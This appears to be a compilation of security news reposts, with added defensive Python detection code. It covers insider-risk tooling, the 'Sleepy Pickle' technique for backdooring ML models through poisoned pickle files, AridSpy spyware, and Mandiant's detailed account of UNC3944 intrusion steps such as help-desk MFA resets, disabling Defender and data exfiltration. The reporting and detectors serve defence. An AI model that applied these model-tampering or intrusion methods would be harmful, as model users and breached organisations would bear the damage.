For example, technologies such as Content Disarm and Reconstruction (CDR) move beyond outdated detection solutions by assuming that all incoming data is potentially malicious and can't be trusted. Everfox CDR works by extracting only the valid business information from files (either discarding or storing the originals), verifying the extracted information is well-structured, and then building new, fully functional files to carry the information to its destination. It's a game-changer for highly regulated industries for mitigating against the threat of even the most advanced zero-day attacks and exploits. Pivoting from detection to prevention in this way is especially important with the recent evolution in hybrid workforces and digital transformation and their resultant usage of content and electronic information everywhere.

As we know however, threats have moved beyond being external only. Insider Risk Programs are a critical component of any holistic cybersecurity strategy, addressing vulnerabilities that may not be as visible as external threats. Sometimes the biggest risk to your data can come from within.

Collaboration and Information Sharing:

Collaboration between military and private-sector organizations is becoming increasingly common. Regulated industries are leveraging partnerships with government agencies, defense contractors, and cybersecurity experts to gain access to cutting-edge technologies, threat intelligence, and best practices. By sharing information and expertise, vital industries can strengthen their cyber defenses, protect their data and stay ahead of emerging threats.

Mitigating Insider Cyber Risks:

By implementing robust internal security measures, organizations can further protect sensitive data and safeguard critical infrastructure. With solutions such as Insider Risk security, industries can better protect sensitive data, maintain compliance and fortify defenses against a range of risks.

Everfox Insider Protection Solutions allow you to uncover internal threats before the loss becomes real, combining visibility and analytics to help industries understand how users interact with critical data and stop risky behaviors "left of loss."

Adopting Military Strategies

Military organizations have long been at the forefront of cybersecurity advancements, developing the sophisticated defense mechanisms needed to protect national security interests. With increasing threat levels and consequences, regulated industries are now recognizing the value of adopting military-inspired strategies and technologies to defend their own networks. Military cyber defenses such as Cross Domain Solutions emphasize proactive threat prevention rather than reliance on detection, rapid response capabilities, and layered security protocols, all of which are essential in combating modern cyber threats.

In an era defined by escalating cyber threats and stringent regulatory landscapes, industries and organizations are increasingly turning to military-grade cyber defenses to fortify their security posture. By embracing military-inspired strategies, technologies, and partnerships, organizations can enhance their resilience against cyber threats, mitigate risks, and uphold regulatory compliance. The integration of military cyber defenses will prove essential in safeguarding critical assets and preserving the integrity of regulated industries.

Note: This article was expertly contributed by Daniel Feaver. He specializes in designing and delivering cross-domain solutions for the UK Government and Defense, enhancing connectivity between previously unconnectable networks.


from The Hacker News

Thursday, June 13, 2024

New Attack Technique 'Sleepy Pickle' Targets Machine Learning Models

Jun 13, 2024 | Newsroom | Vulnerability / Software Security

The security risks posed by the Pickle format have once again come to the fore with the discovery of a new "hybrid machine learning (ML) model exploitation technique" dubbed Sleepy Pickle.

The attack method, per Trail of Bits, weaponizes the ubiquitous format used to package and distribute machine learning (ML) models to corrupt the model itself, posing a severe supply chain risk to an organization's downstream customers.

"Sleepy Pickle is a stealthy and novel attack technique that targets the ML model itself rather than the underlying system," security researcher Boyan Milanov said.

While pickle is a widely used serialization format by ML libraries like PyTorch, it can be used to carry out arbitrary code execution attacks simply by loading a pickle file (i.e., during deserialization).

"We suggest loading models from users and organizations you trust, relying on signed commits, and/or loading models from [TensorFlow] or Jax formats with the from_tf=True auto-conversion mechanism," Hugging Face points out in its documentation.

Sleepy Pickle works by inserting a payload into a pickle file using open-source tools like Fickling, and then delivering it to a target host by one of four techniques: an adversary-in-the-middle (AitM) attack, phishing, supply chain compromise, or the exploitation of a system weakness.

"When the file is deserialized on the victim's system, the payload is executed and modifies the contained model in-place to insert backdoors, control outputs, or tamper with processed data before returning it to the user," Milanov said.

Put differently, the payload injected into the pickle file containing the serialized ML model can be abused to alter model behavior by tampering with the model weights, or tampering with the input and output data processed by the model.
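The deserialization risk described above is easier to reason about with a loader that refuses to execute anything it did not expect. The following Python is an added example, not code from Trail of Bits, Hugging Face or any ML library: it first lists, without loading, every global a pickle would import, then loads the file through an Unpickler whose find_class allowlist (an assumption for this example, limited to collections.OrderedDict) rejects any other import, so a REDUCE that tries to call something outside that list fails instead of running. The ConstructedHook class is a constructed stand-in for a payload-carrying object; it only calls print so the demonstration is harmless.

```python
import io
import pickle
import pickletools
from collections import OrderedDict, deque

# Globals a weights-only model pickle is allowed to import. This allowlist is an
# assumption for the example; a real loader would enumerate exactly the classes its
# model format needs and nothing else.
ALLOWED_GLOBALS = frozenset({("collections", "OrderedDict")})

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
GET_OPS = {"GET", "BINGET", "LONG_BINGET"}
PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """List every (module, name) the pickle would import, without running any of it.

    GLOBAL carries "module name" in its argument. STACK_GLOBAL (protocol 4+) pops the
    two most recently pushed strings, which may come from the memo (BINGET), so we
    track pushed strings and the memo. This is a triage scan, not a full emulator;
    the load-time allowlist below is the real enforcement point.
    """
    memo: dict[int, object] = {}
    recent: deque = deque(maxlen=2)
    top: object = None
    refs: list[tuple[str, str]] = []
    for op, arg, _pos in pickletools.genops(io.BytesIO(data)):
        if op.name in STRING_OPS:
            top = arg
            recent.append(arg)
        elif op.name in GET_OPS:
            top = memo.get(arg)
            if isinstance(top, str):
                recent.append(top)
        elif op.name == "MEMOIZE":
            memo[len(memo)] = top          # MEMOIZE stores the stack top under the next index
        elif op.name in PUT_OPS:
            memo[arg] = top
        elif op.name == "GLOBAL":
            module, _, name = arg.partition(" ")
            refs.append((module, name))
            top = None
        elif op.name == "STACK_GLOBAL":
            if len(recent) == 2:
                refs.append((recent[0], recent[1]))
            recent.clear()
            top = None
        else:
            top = None                     # anything else: the stack top is not a string we track
    return refs


class AllowlistUnpickler(pickle.Unpickler):
    """Imports nothing outside ALLOWED_GLOBALS, so REDUCE/BUILD can only reach vetted callables."""

    def find_class(self, module: str, name: str):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"refused global {module}.{name}")
        return super().find_class(module, name)


def safe_load(data: bytes):
    """Static triage first, then the restricted load. Raises UnpicklingError on anything unexpected."""
    refused = [ref for ref in referenced_globals(data) if ref not in ALLOWED_GLOBALS]
    if refused:
        names = ", ".join(f"{m}.{n}" for m, n in refused)
        raise pickle.UnpicklingError(f"pickle references disallowed globals: {names}")
    return AllowlistUnpickler(io.BytesIO(data)).load()


def try_load(data: bytes) -> tuple[bool, object]:
    """(True, obj) on success, (False, error message) when the loader refuses the file."""
    try:
        return True, safe_load(data)
    except pickle.UnpicklingError as exc:
        return False, str(exc)


class ConstructedHook:
    """Constructed stand-in for a payload-carrying object: on load, REDUCE makes the
    unpickler call builtins.print. A real payload would call something far less benign,
    which is exactly what the allowlist stops."""

    def __reduce__(self):
        return (print, ("constructed hook executed",))


def benign_pickle() -> bytes:
    """Constructed weights-only checkpoint: an OrderedDict of layer name -> values."""
    return pickle.dumps(OrderedDict([("layer.weight", [0.1, 0.2]), ("layer.bias", [0.0])]), protocol=4)


def hostile_pickle() -> bytes:
    """Constructed pickle that carries the hook next to otherwise ordinary data."""
    return pickle.dumps({"weights": [1.0, 2.0], "hook": ConstructedHook()}, protocol=4)


if __name__ == "__main__":
    print(referenced_globals(benign_pickle()), try_load(benign_pickle())[0])
    print(referenced_globals(hostile_pickle()), try_load(hostile_pickle()))
```

The static scan is what lets a pipeline quarantine a file before any Python process touches it; the allowlisted Unpickler is the backstop for anything the scan cannot resolve. Note that the hostile sample is refused even though most of its content is ordinary data, which is the "any pickle file in the supply chain" point Milanov makes below.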

In a hypothetical attack scenario, the approach could be used to generate harmful outputs or misinformation that can have disastrous consequences to user safety (e.g., drink bleach to cure flu), steal user data when certain conditions are met, and attack users indirectly by generating manipulated summaries of news articles with links pointing to a phishing page.

Trail of Bits said that Sleepy Pickle can be weaponized by threat actors to maintain surreptitious access on ML systems in a manner that evades detection, given that the model is compromised when the pickle file is loaded in the Python process.

This is also more effective than directly uploading a malicious model to Hugging Face, as it can modify model behavior or output dynamically without having to entice their targets into downloading and running them.

"With Sleepy Pickle attackers can create pickle files that aren't ML models but can still corrupt local models if loaded together," Milanov said. "The attack surface is thus much broader, because control over any pickle file in the supply chain of the target organization is enough to attack their models."

"Sleepy Pickle demonstrates that advanced model-level attacks can exploit lower-level supply chain weaknesses via the connections between underlying software components and the final application."


from The Hacker News

Arid Viper Launches Mobile Espionage Campaign with AridSpy Malware

Jun 13, 2024 | Newsroom | Threat Intelligence / Mobile Security

The threat actor known as Arid Viper has been attributed to a mobile espionage campaign that leverages trojanized Android apps to deliver a spyware strain dubbed AridSpy.

"The malware is distributed through dedicated websites impersonating various messaging apps, a job opportunity app, and a Palestinian Civil Registry app," ESET researcher Lukáš Štefanko said in a report published today. "Often these are existing applications that had been trojanized by the addition of AridSpy's malicious code."

The activity is said to have spanned as many as five campaigns since 2022, with prior variants of AridSpy documented by Zimperium and 360 Beacon Labs. Three out of the five campaigns are still active.

Arid Viper, a suspected Hamas-affiliated actor who is also called APT-C-23, Desert Falcon, Grey Karkadann, Mantis, and Two-tailed Scorpion, has a long track record of using mobile malware since its emergence in 2017.

"Arid Viper has historically targeted military personnel in the Middle East, as well as journalists and dissidents," SentinelOne noted late last year, adding the group "continues to thrive in the mobile malware space."

ESET's analysis of the latest version of AridSpy shows that it has been transformed into a multi-stage trojan, in which the initial, trojanized app downloads additional payloads from a command-and-control (C2) server.

The attack chains mainly involve targeting users in Palestine and Egypt via bogus sites that function as distribution points for the booby-trapped apps.

Some of the fake-but-functional apps claim to be secure messaging services such as LapizaChat, NortirChat, and ReblyChat, each of which is based on legitimate apps like StealthChat, Session, and Voxer Walkie Talkie Messenger, while another app purports to be from the Palestinian Civil Registry.

The website for the Palestinian Civil Registry ("palcivilreg[.]com"), which was registered on May 30, 2023, has been also found to be advertised via a dedicated Facebook page that has 179 followers. The app propagated via the website is inspired by an app of the same name that's available on the Google Play Store.

"The malicious app available on palcivilreg[.]com is not a trojanized version of the app on Google Play; however, it uses that app's legitimate server to retrieve information," Štefanko said. "This means that Arid Viper was inspired by that app's functionality but created its own client layer that communicates with the legitimate server."

ESET said it further discovered AridSpy being disseminated under the guise of a job opportunity app from a website ("almoshell[.]website") registered in August 2023. A notable aspect of the app is that it's not based on any legitimate app.

Upon installation, the malicious app checks for the presence of security software against a hard-coded list, and proceeds further to download a first-stage payload only if none of them are installed on the device. The payload impersonates an update of Google Play Services.

"This payload works separately, without the necessity of having the trojanized app installed on the same device," Štefanko explained. "This means that if the victim uninstalls the initial trojanized app, for example LapizaChat, AridSpy will not be in any way affected."

The main responsibility of the first-stage is to download the next-stage component, which harbors the malicious functionality and makes use of a Firebase domain for C2 purposes.

The malware supports a wide range of commands to harvest data from the devices and can even deactivate itself or perform exfiltration when on a mobile data plan. Data exfiltration is initiated either by means of a command or when a specifically defined event is triggered.

"If the victim locks or unlocks the phone, AridSpy will take a picture using the front camera and send it to the exfiltration C&C server," Štefanko said. "Pictures are taken only if it is more than 40 minutes since the last picture was taken and the battery level is above 15%."


from The Hacker News

UNC3944 Targets SaaS Applications


UNC3944 is a financially motivated threat group that carries significant overlap with public reporting of "0ktapus," "Octo Tempest," "Scatter Swine," and "Scattered Spider," and has been observed adapting its tactics to include data theft from software-as-a-service (SaaS) applications to attacker-owned cloud storage objects (using cloud synchronization tools), persistence mechanisms against virtualization platforms, and lateral movement via SaaS permissions abuse. Active since at least May 2022, UNC3944 has leveraged underground communities like Telegram to acquire tools, services, and support to enhance their operations.

Initially, UNC3944 focused on credential harvesting and SIM swapping attacks in their operations, eventually migrating to ransomware and data theft extortion. However, recently, UNC3944 has shifted to primarily data theft extortion without the use of ransomware. This change in objectives has precipitated an expansion of targeted industries and organizations as evidenced by Mandiant investigations.

Evidence also suggests UNC3944 has occasionally resorted to fear mongering tactics to gain access to victim credentials. These tactics include threats of doxxing personal information, physical harm to victims and their families, and the distribution of compromising material.

This blog post aims to spotlight UNC3944's attacks against SaaS applications, providing insights into the group's evolving TTPs in line with its shifting mission objectives.

Tactics, Techniques, and Procedures (TTPs)

Figure 1: UNC3944 attack lifecycle

Mandiant has observed UNC3944 in multiple engagements leveraging social engineering techniques against corporate help desks to gain initial access to existing privileged accounts. Mandiant has analyzed several forensic recordings of these call center attacks, and of the observed recordings Mandiant noted the threat actors spoke with clear English and targeted accounts with high privilege potential. Additionally, it has been noted that they already possessed the personally identifiable information (PII) of their victims, which they used to bypass help desk administrators’ user identity verification. Mandiant observed use of verification information, such as the last four digits of Social Security numbers, dates of birth, manager names, and job titles with associated coworkers. The level of sophistication in these social engineering attacks is evident in both the extensive research performed on potential victims and the high success rate in said attacks.

UNC3944 operators employed consistent social engineering tactics across various victims, often calling service desks to claim they were receiving a new phone, warranting a multi-factor authentication (MFA) reset. By interacting with service desk administrators, UNC3944 could not only reset passwords for privileged accounts but also bypass associated MFA protections. The social engineering techniques went beyond the call centers as extensive SMS phishing campaigns were also observed. 

After successfully gaining initial access to victim environments, UNC3944 conducted internal reconnaissance of Microsoft applications, such as SharePoint, to enumerate remote connection requirements. UNC3944 frequently targeted internal help guides and documentation for virtual private networks (VPN), virtual desktop infrastructure (VDI), and remote telework utilities that were available on its victims’ SharePoint sites. UNC3944 abused existing legitimate third-party tooling for remote access to compromised environments.

UNC3944 has also leveraged Okta permissions abuse techniques through the self-assignment of a compromised account to every application in an Okta instance to expand the scope of intrusion beyond on-premises infrastructure to Cloud and SaaS applications. With this privilege escalation, the threat actor could not only abuse applications that leverage Okta for single sign-on (SSO), but also conduct internal reconnaissance through use of the Okta web portal by visually observing what application tiles were available after these role assignments.

Virtual Machine Compromise

An aspect of these intrusions involves a more aggressive method of persistence occurring through the creation of new virtual machines. In several instances, Mandiant observed UNC3944 access vSphere and Azure, using SSO applications, to create new virtual machines from which they conducted all follow-on activities. The notable point is that administrative groups or ordinary administrator permissions reachable through SSO applications were abused to establish this method of persistence.

Mandiant observed publicly available utilities such as MAS_AIO and privacy-script.bat to reconfigure the newly created virtual machine to deactivate various policies deemed contrary to privacy. This generally involved removing default Microsoft Defender protections as well as certain Windows telemetry that normally aids a forensic investigation. Additionally, a lack of endpoint monitoring allowed the group to download tools such as Mimikatz, ADRecon, and various covert tunneling tools, such as NGROK, RSOCX, and Localtonet. The use of these tools allowed UNC3944 access to the device without the need to use VPN or MFA. Other tooling included the installation of Python libraries, such as IMPACKET.

Tracking further activity from this device proves tedious when pivoting to cloud investigations. Due to the nature of cloud setups, all further cloud access was sourced from inside the compromised environment, meaning normal indicators of compromise such as poor reputation IP addresses don't effectively differentiate normal activity from threat actor activity. Despite this, Mandiant noted traditional browser artifact forensics still proved useful for tracking application accesses.

To bypass authentication controls, Mandiant has observed the use of an optical disc image file (ISO) called PCUnlocker. By attaching this ISO to existing virtual machines through the vCenter appliance, UNC3944 reset local administrator passwords allowing the bypass of normal domain controls. This ISO requires restarting and changing BIOS settings to boot into this mountable image to effectively subvert domain controls. Monitoring of virtual machine uptime or even brief impacts would allow for potential detection opportunities.
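The detection opportunity noted above (an ISO attached to a VM, followed by a short outage) can be expressed as a simple rule over vCenter events. The Python below is an added example, not Mandiant's or VMware's code: it assumes vSphere events are exported to a SIEM with the vSphere event class names (VmReconfiguredEvent, VmPoweredOffEvent, VmPoweredOnEvent) and a free-text detail field, and it flags any VM whose CD-ROM backing is switched to an ISO and which is then power-cycled within a configurable window. The sample events, VM names, users and datastore paths are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed vCenter-style events in the shape a syslog/SIEM export might produce.
# The type names follow vSphere's event classes as this example assumes; the VMs,
# users and datastore paths are made up.
SAMPLE_EVENTS = [
    {"time": "2023-10-09T01:10:00Z", "vm": "dc01", "user": "svc-backup@corp", "type": "VmReconfiguredEvent",
     "detail": 'Modified: config.hardware.device(3000).backing.fileName: "" -> "[datastore1] iso/pcunlocker.iso"'},
    {"time": "2023-10-09T01:12:00Z", "vm": "dc01", "user": "svc-backup@corp", "type": "VmPoweredOffEvent",
     "detail": "dc01 on esx01 is powered off"},
    {"time": "2023-10-09T01:13:00Z", "vm": "dc01", "user": "svc-backup@corp", "type": "VmPoweredOnEvent",
     "detail": "dc01 on esx01 is powered on"},
    # Routine memory change: no ISO involved, must not alert.
    {"time": "2023-10-09T09:00:00Z", "vm": "web01", "user": "vsphere-admin@corp", "type": "VmReconfiguredEvent",
     "detail": "Modified: config.hardware.memoryMB: 4096 -> 8192"},
    # ISO attached for patching, but the VM is only restarted hours later: outside the window.
    {"time": "2023-10-09T12:00:00Z", "vm": "app02", "user": "vsphere-admin@corp", "type": "VmReconfiguredEvent",
     "detail": 'Modified: config.hardware.device(3000).backing.fileName: "" -> "[datastore1] iso/ubuntu-22.04.iso"'},
    {"time": "2023-10-09T16:30:00Z", "vm": "app02", "user": "vsphere-admin@corp", "type": "VmPoweredOffEvent",
     "detail": "app02 on esx02 is powered off"},
    {"time": "2023-10-09T16:31:00Z", "vm": "app02", "user": "vsphere-admin@corp", "type": "VmPoweredOnEvent",
     "detail": "app02 on esx02 is powered on"},
]

# Matches a datastore-relative ISO path such as "[datastore1] iso/tool.iso".
ISO_RE = re.compile(r"\[[^\]]+\]\s*[^\s\"]+\.iso", re.IGNORECASE)


def parse_ts(s: str) -> datetime:
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def detect_iso_boot_cycles(events, window: timedelta = timedelta(minutes=30)) -> list[dict]:
    """Flag a VM that gets an ISO attached and is then powered off and back on within `window`.

    A reconfigure that points the CD-ROM at an ISO, followed by a power cycle, is the
    footprint of booting an external image instead of the installed OS. Legitimate
    maintenance produces the same sequence, so the alert records who did it and how long
    the VM was down so an analyst can check it against change tickets.
    """
    state: dict[str, dict] = {}
    alerts: list[dict] = []
    for ev in sorted(events, key=lambda e: parse_ts(e["time"])):
        vm, t = ev["vm"], parse_ts(ev["time"])
        st = state.setdefault(vm, {})
        if ev["type"] == "VmReconfiguredEvent":
            m = ISO_RE.search(ev["detail"])
            if m:
                st.update(iso=m.group(0), iso_at=t, iso_by=ev["user"], off_at=None)
        elif ev["type"] == "VmPoweredOffEvent":
            # Only a power-off shortly after the attach counts toward the sequence.
            if st.get("iso_at") is not None and t - st["iso_at"] <= window:
                st["off_at"] = t
            else:
                st["off_at"] = None
        elif ev["type"] == "VmPoweredOnEvent":
            if st.get("off_at") is not None:
                alerts.append({
                    "vm": vm,
                    "user": st["iso_by"],
                    "iso": st["iso"],
                    "iso_attached": st["iso_at"].isoformat(),
                    "offline_seconds": int((t - st["off_at"]).total_seconds()),
                })
            state[vm] = {}       # one alert per attach/boot sequence
    return alerts


def run_detection() -> list[dict]:
    return detect_iso_boot_cycles(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_detection():
        print(alert)
```

The rule is deliberately narrow: it keys on the ISO attach plus the outage rather than on any tool name, so a renamed image does not evade it, and the recorded user lets the analyst ask whether that account should be reconfiguring domain controllers at all.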

Additionally, in the past investigations, Mandiant has observed UNC3944 deploying ALPHV ransomware against the Virtual Machine File Systems, on the ESXI hypervisors themselves, to cause destructive actions inside of an environment. As a by-product of this activity, the attacker’s deployed virtual machines were usually encrypted and evidence of activities within the network was destroyed. Since early 2024, Mandiant has not observed ransomware deployment by this threat group; however, the potential to destroy or remove evidence is still a capability they leverage.

Despite anti-forensic measures, evidence showed that observed activity in victim environments was primarily aimed at discovering key infrastructure and potential exfiltration targets, such as databases and web content. Once located, data exfiltration occurred through these virtual machines to various high reputation resources such as Google Cloud Platform (GCP) and Amazon Web Services (AWS).

Pivot to SaaS Applications

In addition to traditional on-premises activity, Mandiant observed pivots into client SaaS applications. Traditionally used to centralize and increase security, in these instances they allowed access to applications hosted through MFA providers. Mandiant observed access to such applications as vCenter, CyberArk, SalesForce, Azure, CrowdStrike, AWS, and GCP. Figure 2 provides an excerpt from a single Okta SSO log entry associated with this activity.

    "timestamp": "2023-10-09T02:49:49.226Z",
    "user": "<redacted>",
    "account": "redacted<>@corp.<redacted_domain>.com",
    "source_ip": "",
    "service": "Crowdstrike Falcon",
    "sso_provider": "OKTA",
    "geoip_city": "<redacted>",
    "geoip_country_code": "US",
    "geoip_country_name": "United States",
    "geoip_organization": "Verizon Fios",
    "geoip_region": "NJ",
                "rawUserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; 
x64; rv:109.0) Gecko/20100101 Firefox/118.0",
                "os": "Windows 10",
                "browser": "FIREFOX"
            "zone": "null",
            "device": "Computer",
            "id": null,
            "ipAddress": "",
        "displayMessage": "User single sign on to app",
        "eventType": "user.authentication.sso",
            "result": "SUCCESS",
            "reason": null
        "published": "2023-10-09T02:49:49.226Z",
        "severity": "INFO",
                "audience": "
                "subject": "<redacted_username>@<redacted_domain>.com",
                "signOnMode": "SAML 2.0",
                "authenticationClassRef": "urn:oasis:names:tc:SAML:2.0:ac:
                "authTime": "2023-10-09T02:49:49.218Z",
                "requestUri": "/app/<redacted_domain>_crowdstrikefalcon_1/
                "issuer": "[redacted]",
                "url": "/app/<redacted_domain>_crowdstrikefalcon_1//sso/
                "initiationType": "IDP_INITIATED",
                "authnRequestId": "ZSM63wQkl6jH83LTuK9pEwAACzA",
                "requestId": "ZSNqTUXEzicJob0qyh4qzQAAAdw",
                "dtHash": "2f91954af8b8c55fa21b2de175ef84173abf820a7da3e
                "expiryTime": "2023-10-09T02:54:49.219Z",
                "issuedAt": "2023-10-09T02:49:49.218Z",
                "jti": "id35957951569260176516591432"

Figure 2: Okta SSO log excerpt associated with access of CrowdStrike Falcon console
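Two of the behaviours described in this post leave a clean trail in the identity provider's log: the Okta self-assignment of one account to many applications, and a single sign-on into a security console from a client the user has never used. The Python below is an added example, not Mandiant's or Okta's code. It assumes the events have been flattened by a SIEM into one JSON object per line with the field names shown in the excerpt above (timestamp, user, service, geoip_organization, os, browser), uses Okta's application.user_membership.add event type with flattened actor and target_user fields for assignments, and builds a per-user baseline of (ISP, OS, browser) combinations from events before a cutoff date. The log lines, users and cutoff are constructed.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Consoles whose SSO access from an unfamiliar client deserves a closer look. Taken from
# the applications named in this post; the exact list is an assumption for the example.
SENSITIVE_APPS = {"Crowdstrike Falcon", "CyberArk", "vCenter", "AWS", "Azure", "GCP"}

# Constructed, flattened Okta-style events mirroring the field names of the excerpt above.
# Real System Log events are nested (client.userAgent.rawUserAgent, actor, target[]);
# a SIEM normally flattens them roughly like this.
SAMPLE_LOG = """\
{"timestamp": "2023-09-20T13:00:00.000Z", "eventType": "user.authentication.sso", "user": "alice", "service": "Salesforce", "geoip_organization": "Comcast", "os": "Windows 10", "browser": "CHROME"}
{"timestamp": "2023-09-21T10:00:00.000Z", "eventType": "user.authentication.sso", "user": "bob", "service": "AWS", "geoip_organization": "Verizon Fios", "os": "macOS", "browser": "SAFARI"}
{"timestamp": "2023-09-25T09:12:00.000Z", "eventType": "user.authentication.sso", "user": "alice", "service": "Crowdstrike Falcon", "geoip_organization": "Comcast", "os": "Windows 10", "browser": "CHROME"}
{"timestamp": "2023-10-02T08:30:00.000Z", "eventType": "user.authentication.sso", "user": "alice", "service": "Workday", "geoip_organization": "Comcast", "os": "Windows 10", "browser": "CHROME"}
{"timestamp": "2023-10-06T09:00:00.000Z", "eventType": "application.user_membership.add", "actor": "itadmin", "target_user": "dave", "service": "Salesforce"}
{"timestamp": "2023-10-09T02:31:00.000Z", "eventType": "application.user_membership.add", "actor": "alice", "target_user": "alice", "service": "CyberArk"}
{"timestamp": "2023-10-09T02:32:00.000Z", "eventType": "application.user_membership.add", "actor": "alice", "target_user": "alice", "service": "vCenter"}
{"timestamp": "2023-10-09T02:33:00.000Z", "eventType": "application.user_membership.add", "actor": "alice", "target_user": "alice", "service": "AWS"}
{"timestamp": "2023-10-09T02:34:00.000Z", "eventType": "application.user_membership.add", "actor": "alice", "target_user": "alice", "service": "Azure"}
{"timestamp": "2023-10-09T02:35:00.000Z", "eventType": "application.user_membership.add", "actor": "alice", "target_user": "alice", "service": "Crowdstrike Falcon"}
{"timestamp": "2023-10-09T02:49:49.226Z", "eventType": "user.authentication.sso", "user": "alice", "service": "Crowdstrike Falcon", "geoip_organization": "Verizon Fios", "os": "Windows 10", "browser": "FIREFOX"}
{"timestamp": "2023-10-09T03:10:00.000Z", "eventType": "user.authentication.sso", "user": "bob", "service": "AWS", "geoip_organization": "Verizon Fios", "os": "macOS", "browser": "SAFARI"}
{"timestamp": "2023-10-09T04:00:00.000Z", "eventType": "user.authentication.sso", "user": "alice", "service": "Salesforce", "geoip_organization": "Comcast", "os": "Windows 10", "browser": "CHROME"}
"""

# Events before this cutoff build each user's profile of normal clients (constructed date).
BASELINE_END = datetime(2023, 10, 5, tzinfo=timezone.utc)


def parse_ts(s: str) -> datetime:
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def load_events(text: str) -> list[dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def client_fingerprint(ev: dict) -> tuple:
    """ISP, OS and browser together identify the client well enough for a baseline."""
    return (ev.get("geoip_organization"), ev.get("os"), ev.get("browser"))


def detect_new_client_sso(events: list[dict], baseline_end: datetime = BASELINE_END) -> list[dict]:
    """Flag SSO into a sensitive app from a client combination the user never used during the baseline."""
    seen: dict[str, set] = defaultdict(set)
    alerts = []
    for ev in sorted(events, key=lambda e: parse_ts(e["timestamp"])):
        if ev["eventType"] != "user.authentication.sso":
            continue
        fp, ts = client_fingerprint(ev), parse_ts(ev["timestamp"])
        if ts < baseline_end:
            seen[ev["user"]].add(fp)
        elif ev["service"] in SENSITIVE_APPS and fp not in seen[ev["user"]]:
            alerts.append({"rule": "new_client_sso", "user": ev["user"], "app": ev["service"],
                           "client": fp, "timestamp": ev["timestamp"]})
    return alerts


def detect_self_assignment_bursts(events: list[dict], window: timedelta = timedelta(minutes=10),
                                  threshold: int = 5) -> list[dict]:
    """Flag an actor who assigns *themselves* to `threshold` or more apps within `window`."""
    per_actor: dict[str, list] = defaultdict(list)
    for ev in events:
        if ev["eventType"] == "application.user_membership.add" and ev["actor"] == ev["target_user"]:
            per_actor[ev["actor"]].append((parse_ts(ev["timestamp"]), ev["service"]))
    alerts = []
    for actor, items in per_actor.items():
        items.sort()
        start = 0
        for end in range(len(items)):            # sliding window over the sorted assignments
            while items[end][0] - items[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({"rule": "self_assignment_burst", "user": actor,
                               "apps": sorted(app for _, app in items[start:end + 1]),
                               "count": end - start + 1})
                break
    return alerts


def run_detections() -> dict:
    events = load_events(SAMPLE_LOG)
    return {"new_client_sso": detect_new_client_sso(events),
            "self_assignment_burst": detect_self_assignment_bursts(events)}


if __name__ == "__main__":
    print(json.dumps(run_detections(), indent=2))
```

Neither rule depends on source IP reputation, which is the point of the post's observation that attacker activity sourced from inside the environment blends in; both instead depend on what an account normally looks like and on who is granting access to whom.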

Mandiant observed the use of endpoint detection and response tooling to further test access to the environment, such as the creation of API keys inside of CrowdStrike’s external console, which allowed the threat actor to execute commands within the Real Time Response (RTR) module such as whoami and quser. Figure 3 contains several events associated with UNC3944 commands executed in the Crowdstrike Falcon Real-Time-Response (RTR) module of a victim environment.

runscript -raw=```whoami``` -Timeout=```3600```
runscript -raw=```curl``` -Timeout=```3600```
runscript -raw=```curl``` -Timeout=```3600```
runscript -raw=```curl``` -Timeout=```3600```
runscript -raw=```curl``` -Timeout=```3600```
runscript -raw=```curl``` -Timeout=```3600```
runscript -raw=```curl -usebasicparsing``` -Timeout=```3600```
runscript -raw=```curl -usebasicparsing``` -Timeout=```3600```
runscript -raw=```curl -usebasicparsing``` -Timeout=```3600```
runscript -raw=```curl

Figure 3: Commands executed via CrowdStrike Falcon RTR module

UNC3944 continued to access Azure, CyberArk, Salesforce, and Workday and within each of these applications conducted further reconnaissance.

Specifically for CyberArk, Mandiant has observed the download and use of the PowerShell module psPAS specifically to programmatically interact with an organization’s CyberArk instance. This utility allows for faster enumeration of CyberArk vaults and makes further investigation more difficult as, without robust PowerShell logging, it is difficult to determine what commands were executed against a CyberArk instance.

After sufficient reconnaissance, Mandiant observed exfiltration from SaaS applications through cloud synchronization utilities, such as Airbyte and Fivetran, to move data from cloud-hosted data sources to external attacker-owned cloud storage resources, such as S3 buckets. These applications required only credentials and a path to the resources to sync the data to an external source automatically, often without the need for a subscription or expensive costs. Figure 4 contains an excerpt of Airbyte logs that Mandiant successfully acquired from an UNC3944 victim.

2023-10-09 15:42:01 destination > INFO a.m.s.StreamTransferManager
(uploadStreamPart):558 [Manager uploading to prodbucket11/salesforce
/Account/[redacted].csv with id XXdIBNCrR...uvUswAXY-]: Finished uploading 
[Part number 18 containing 10.01 MB]

2023-10-09 15:42:01 destination > INFO a.m.s.StreamTransferManager
(complete):395 [Manager uploading to prodbucket11/salesforce/Account
/[redacted].csv with id XXdIBNCrR...uvUswAXY-]: Completed
2023-10-09 15:42:01 destination > INFO i.a.i.d.s.S3StorageOperations
(loadDataIntoBucket):214 Uploaded buffer file to storage: [redacted].csv -> 
salesforce/Account/[redacted].csv (filename: [redacted].csv)

2023-10-09 15:42:01 destination > INFO i.a.i.d.s.S3StorageOperations
(uploadRecordsToBucket):131 Successfully loaded records to stage 
salesforce/Account/2023_10_09_1696844737410_ with 0 re-attempt(s)
2023-10-09 15:42:01 destination > INFO i.a.i.d.r.FileBuffer(deleteFile):109 
Deleting tempFile data [redacted].csv

2023-10-09 15:42:01 destination > INFO i.a.i.d.r.SerializedBufferingStrategy
(flushSingleBuffer):128 Flushing completed for Account

2023-10-09 15:42:01 destination > INFO i.a.i.d.r.SerializedBufferingStrategy
(lambda$getOrCreateBuffer$0):109 Starting a new buffer for stream Account 
(current state: -14332 bytes in 0 buffers)

2023-10-09 15:42:12 replication-orchestrator > Records read: 3635000 (18 GB)

Figure 4: Excerpt of Airbyte logs associated with data theft activity
